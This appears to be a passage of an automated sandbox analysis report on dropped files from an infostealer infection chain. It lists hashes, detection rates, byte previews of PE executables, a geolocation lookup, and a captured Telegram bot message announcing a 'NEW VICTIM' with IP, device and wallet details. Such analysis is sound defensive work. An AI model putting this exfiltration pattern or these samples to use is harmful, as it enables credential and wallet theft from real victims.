                                                                                                                                                                                                                                                                                        SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                                                                                                                                        MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                                                                                        SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                                                                                        SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                                                                                        SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):21
                                                                                                                                                                                                                                                                                        Entropy (8bit):3.880179922675737
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:gFsR0GOWW:gyRhI
                                                                                                                                                                                                                                                                                        MD5:408E94319D97609B8E768415873D5A14
                                                                                                                                                                                                                                                                                        SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                                                                                                                                                                                                                                                        SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                                                                                                                                                                                                                                                        SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:9tKiK3bsYm4fMuK47Pk3s
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):776
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108546360098665
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24:YKOHIy1JVBa4YGQVPe071kWPPyoZEB6eiasJENBm9c:YVHIQTBj/Q51bPtZLujMc
                                                                                                                                                                                                                                                                                        MD5:00AF2D9E097D199AA57015C827AA4BDC
                                                                                                                                                                                                                                                                                        SHA1:23F88DDDEB5A3A71C11AB306852B48492601D09B
                                                                                                                                                                                                                                                                                        SHA-256:4937C3C4A29E398545DF31BEDD7AD2EEB7C76C0D166336CFEB02A647C7E430F8
                                                                                                                                                                                                                                                                                        SHA-512:7D6EE381041CBB29B275F9110D5309335F31E2D8B6AB0FE59AEE0CE73023E6083CD66B1EF6A25BEE5A26C318498DE43AD3050596784045ABBD9D23D442F06309
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{"ok":true,"result":{"message_id":3302,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018511,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):308224
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.2756558263805555
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:b2JEWGoxDtDYL5s/oAg5+Z4vDWcEGpQTMz9J0tYRVmOEe3M5X64:NWGoxDt0LCgArZ4vHEGpQTMz72K4
                                                                                                                                                                                                                                                                                        MD5:FF1E7643A5C9294BD8E8FD743B323C8F
                                                                                                                                                                                                                                                                                        SHA1:B35C6E9090B44C2DB2220C5C42C0F68210BA73A9
                                                                                                                                                                                                                                                                                        SHA-256:25F4451B243D5E5B05EACCF5DD58E3CFCEE7969B145D9AAD7AFF6750AB9A6D0B
                                                                                                                                                                                                                                                                                        SHA-512:62B1F41DCAB0F4330D761CDBFC4E99E15830B4CDCC44E7788FD15F57F5043EB53E626E009C397DCCE13841E192165C4584CEE0F57C0E5BD5B876F507D051B675
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...`PYg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):605696
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.377818589865092
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                                                                                                        MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                                                                                                        SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                                                                                                        SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):321
                                                                                                                                                                                                                                                                                        Entropy (8bit):4.99323851364312
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                                                                                                                                        MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                                                                                                                                        SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                                                                                                                                        SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                                                                                                                                        SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                                                                                                        File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):156917
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.994509354006501
                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                        SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                                                                                                                                        MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                                                                                                                                        SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                                                                                                                                        SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                                                                                                                                        SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                                        • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GJ1F663Z\output[1].png, Author: ditekSHen
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2791936
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.551070324318134
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:IgFovv+WOSQ6SVSDXFpcaqYbcmO4el4cMe:7yGW7Q6SYTFDqYbcmO4el/Me
                                                                                                                                                                                                                                                                                        MD5:38702763DFEDB9AD700580558B2E2CDE
                                                                                                                                                                                                                                                                                        SHA1:A9D4F0323B1CF8DA172FE3EBEAB4984BB644C0D6
                                                                                                                                                                                                                                                                                        SHA-256:79581F3E833D3CF26FDCD59A4C87261208909DBE061127F34D57ECB34C3EAA13
                                                                                                                                                                                                                                                                                        SHA-512:4B00ACB48CF0DB1FA63572E84F94CF34E25E52B766E33460ED08ECD769B23C7C3F151FFCA0BECAC759FBDE83245E5256EEA98BD9E056D4CCA8D40BB2B644E180
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+.....r9+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...nwmnxdbs.@*......:*..:..............@...esrtnfgg. ....*......t*.............@....taggant.@....+.."...x*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):393728
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.004737079894222
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
                                                                                                                                                                                                                                                                                        MD5:DFD5F78A711FA92337010ECC028470B4
                                                                                                                                                                                                                                                                                        SHA1:1A389091178F2BE8CE486CD860DE16263F8E902E
                                                                                                                                                                                                                                                                                        SHA-256:DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
                                                                                                                                                                                                                                                                                        SHA-512:A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1502720
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.646111739368707
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                                                                                                                                                                                                                                        MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                                                                                                                                                                                                                                        SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                                                                                                                                                                                                                                        SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                                                                                                                                                                                                                                        SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                        Encrypted:false
